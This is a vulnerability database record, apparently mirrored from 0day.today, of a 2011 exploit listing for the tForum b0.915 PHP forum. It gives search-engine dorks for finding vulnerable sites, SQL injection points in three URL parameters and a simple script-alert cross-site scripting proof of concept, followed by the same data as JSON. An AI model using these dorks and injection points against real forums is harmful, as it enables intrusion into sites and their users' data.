Search...

tForum b0.915 Vulnerabilities

2011-12-26T00:00:00

ID 1337DAY-ID-17308
Type zdt
Reporter snup
Modified 2011-12-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: tForum b0.915 Vulnerabilities
# Dork: intext:"powered by tForum b0.915"
# Author: snup
# Contact: [email protected]

 SQL Injection:

 DORK:
  inurl:"viewtopic.php?TopicID=" intext:"powered by tForum b0.915"
  inurl:"viewboard.php?BoardID=" intext:"powered by tForum b0.915"
  inurl:"viewcat.php?CatID=" intext:"powered by tForum b0.915"

 BUG:
  http://127.0.0.1/viewtopic.php?TopicID=[sqli]
  http://127.0.0.1/viewboard.php?BoardID=[sqli]
  http://127.0.0.1/viewcat.php?CatID=[sqli]

 XSS:

 DORK:
  inurl:"username=" intext:"powered by tForum b0.915"

 BUG:
  http://127.0.0.1/member.php?Action=viewprofile&username=&lt;script&gt;alert(1337)&lt;/script&gt;

===========
= Gr33tz: =
====================================================
= agilob, cOnd, czoik, drummachina, gocys, prick   =
= im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom =
= Inj3ct0r Team 1337day.com irc.freenode.net #pakamera                       =
====================================================



#  0day.today [2018-03-02]  #

JSON Vulners Source

Initial Source

{"published": "2011-12-26T00:00:00", "id": "1337DAY-ID-17308", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-03-03T01:39:02", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-03T01:39:02", "rev": 2}, "vulnersScore": 0.1}, "type": "zdt", "lastseen": "2018-03-03T01:39:02", "edition": 2, "title": "tForum b0.915 Vulnerabilities", "href": "https://0day.today/exploit/description/17308", "modified": "2011-12-26T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/17308", "references": [], "reporter": "snup", "sourceData": "# Exploit Title: tForum b0.915 Vulnerabilities\r\n# Dork: intext:\"powered by tForum b0.915\"\r\n# Author: snup\r\n# Contact: [email\u00a0protected]\r\n\r\n SQL Injection:\r\n\r\n DORK:\r\n inurl:\"viewtopic.php?TopicID=\" intext:\"powered by tForum b0.915\"\r\n inurl:\"viewboard.php?BoardID=\" intext:\"powered by tForum b0.915\"\r\n inurl:\"viewcat.php?CatID=\" intext:\"powered by tForum b0.915\"\r\n\r\n BUG:\r\n http://127.0.0.1/viewtopic.php?TopicID=[sqli]\r\n http://127.0.0.1/viewboard.php?BoardID=[sqli]\r\n http://127.0.0.1/viewcat.php?CatID=[sqli]\r\n\r\n XSS:\r\n\r\n DORK:\r\n inurl:\"username=\" intext:\"powered by tForum b0.915\"\r\n\r\n BUG:\r\n http://127.0.0.1/member.php?Action=viewprofile&username=<script>alert(1337)</script>\r\n\r\n===========\r\n= Gr33tz: =\r\n====================================================\r\n= agilob, cOnd, czoik, drummachina, gocys, prick =\r\n= im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom =\r\n= Inj3ct0r Team 1337day.com irc.freenode.net #pakamera =\r\n====================================================\r\n\r\n\n\n# 0day.today [2018-03-02] #"}